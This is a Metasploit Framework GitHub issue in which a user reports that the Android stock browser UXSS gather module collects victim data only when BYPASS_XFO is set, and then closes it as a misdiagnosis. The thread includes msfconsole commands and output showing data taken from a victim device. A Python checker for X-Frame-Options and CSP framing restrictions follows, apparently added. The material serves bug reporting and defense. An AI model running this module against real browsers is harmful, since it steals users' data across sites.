rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

android_stock_browser_uxss does not collect loot unless BYPASS_XFO is set #4599

Closed joswr1ght closed 9 years ago

joswr1ght commented 9 years ago

Using the AOSP Browser on Android 4.1.2, I am unable to collect loot from a specified target URL:

msf > use auxiliary/gather/android_stock_browser_uxss 
msf auxiliary(android_stock_browser_uxss) > set URIPATH /
URIPATH => /
msf auxiliary(android_stock_browser_uxss) > set SRVPORT 80
SRVPORT => 80
msf auxiliary(android_stock_browser_uxss) > set TARGET_URLS http://clownchat.sec575.org
TARGET_URLS => http://clownchat.sec575.org
msf auxiliary(android_stock_browser_uxss) > exploit
[*] Auxiliary module execution completed

[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://172.16.0.190:80/
[*] Server started.
msf auxiliary(android_stock_browser_uxss) > 
[*] 172.16.0.105     android_stock_browser_uxss - Sending initial HTML ...
[*] 172.16.0.105     android_stock_browser_uxss - Request 'GET /'

However, when I set BYPASS_XFO, I do collect the loot from the victim:

msf auxiliary(android_stock_browser_uxss) > kill 0
Stopping job: 0...
msf auxiliary(android_stock_browser_uxss) > set BYPASS_XFO True
BYPASS_XFO => True
msf auxiliary(android_stock_browser_uxss) > exploit
[*] Auxiliary module execution completed

[*] Using URL: http://0.0.0.0:80/
[*]  Local IP: http://172.16.0.190:80/
[*] Server started.
msf auxiliary(android_stock_browser_uxss) > [*] 172.16.0.105     android_stock_browser_uxss - Request 'GET /'
[*] 172.16.0.105     android_stock_browser_uxss - Sending initial HTML ...
[*] 172.16.0.105     android_stock_browser_uxss - Request 'POST /'
[+] Collected data from URL: http://clownchat.sec575.org/activity
[+] Saved to: /root/.msf4/loot/20150116165331_default_172.16.0.105_android.client_243338.txt

In this case, the target server is NOT using X-Frame-Options, and therefore should not require the BYPASS_XFO option (and the awkward popup) for successful exploitation.

Here is a pcap file of the server responses when the BYPASS_XFO option is not set.

https://www.dropbox.com/s/rsz2m2xy6i228b7/android_browser_xss_bypass_xfo_issue.pcap?dl=0

Thanks,

-Josh

joswr1ght commented 9 years ago

Sorry, this was my mistake. The app I was attacking was setting X-Frame-Options in a roundabout way.
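The thread's resolution is that the page being framed did send X-Frame-Options, just not where the reporter expected it (the module loads the target URL in a frame, and the browser refuses to render it if the response forbids framing). The following checker, added here as an illustration and not part of the metasploit-framework module or its test suite, parses raw HTTP responses and reports whether a given origin may frame them, covering both X-Frame-Options and the CSP frame-ancestors directive that supersedes it. The sample responses are constructed, not taken from the issue's pcap, and the origin names are placeholders.

```python
"""Report whether HTTP responses forbid cross-origin framing.

Added illustration for the X-Frame-Options discussion above; not part of
metasploit-framework. Sample responses are constructed, not captured.
"""
from typing import Dict, List, Optional, Tuple


def parse_response_headers(raw: str) -> List[Tuple[str, str]]:
    """Return (name, value) pairs from a raw HTTP/1.1 response; names lowercased."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = []
    for line in head.split("\r\n")[1:]:  # skip the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers.append((name.strip().lower(), value.strip()))
    return headers


def _frame_ancestors(csp_values: List[str]) -> Optional[List[str]]:
    """Extract the frame-ancestors source list from CSP header(s), or None if absent."""
    for csp in csp_values:
        for directive in csp.split(";"):
            parts = directive.strip().split()
            if parts and parts[0].lower() == "frame-ancestors":
                # An empty source list is equivalent to 'none'.
                return [p.lower() for p in parts[1:]] or ["'none'"]
    return None


def framing_blocked(raw: str, framer_origin: str) -> Tuple[bool, str]:
    """Decide whether a page at framer_origin may embed this response in a frame.

    Browsers that understand frame-ancestors ignore X-Frame-Options when the
    directive is present, so CSP is consulted first. Returns (blocked, reason).
    """
    headers = parse_response_headers(raw)
    framer = framer_origin.rstrip("/").lower()

    ancestors = _frame_ancestors(
        [v for n, v in headers if n == "content-security-policy"])
    if ancestors is not None:
        if "'none'" in ancestors:
            return True, "CSP frame-ancestors 'none'"
        if "*" in ancestors or framer in ancestors:
            return False, "CSP frame-ancestors permits framer"
        # 'self' or an explicit list that does not include the framer.
        return True, "CSP frame-ancestors does not list framer"

    xfo = [v for n, v in headers if n == "x-frame-options"]
    if xfo:
        value = xfo[0].strip()
        token = value.split(None, 1)[0].upper()
        if token in ("DENY", "SAMEORIGIN"):
            return True, f"X-Frame-Options {token}"
        if token == "ALLOW-FROM":
            allowed = value.split(None, 1)[1].rstrip("/").lower() if " " in value else ""
            if allowed == framer:
                return False, "X-Frame-Options ALLOW-FROM matches framer"
            return True, "X-Frame-Options ALLOW-FROM does not match framer"
        # Unknown values are ignored by browsers; treat as no restriction.
    return False, "no framing restriction header"


# Constructed responses for a site whose front page is framable but whose
# endpoint serving the interesting data is not (the "roundabout" case).
SAMPLE_RESPONSES: Dict[str, str] = {
    "/": "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html></html>",
    "/activity": ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n"
                  "X-Frame-Options: SAMEORIGIN\r\n\r\n<html></html>"),
    "/csp": ("HTTP/1.1 200 OK\r\nContent-Security-Policy: default-src 'self'; "
             "frame-ancestors 'none'\r\nX-Frame-Options: ALLOW-FROM https://framer.example"
             "\r\n\r\n"),
    "/partner": ("HTTP/1.1 200 OK\r\n"
                 "X-Frame-Options: ALLOW-FROM https://partner.example\r\n\r\n"),
}


def audit(responses: Dict[str, str], framer_origin: str) -> Dict[str, Tuple[bool, str]]:
    """Run framing_blocked over every path so per-endpoint differences stand out."""
    return {path: framing_blocked(raw, framer_origin) for path, raw in responses.items()}


if __name__ == "__main__":
    for path, (blocked, reason) in audit(SAMPLE_RESPONSES, "https://framer.example").items():
        print(f"{path:10} {'BLOCKED' if blocked else 'framable':8} {reason}")
```

Running the audit per endpoint, rather than only against the front page, is what surfaces the situation in this issue: the root document carried no header while the page the module actually needed did.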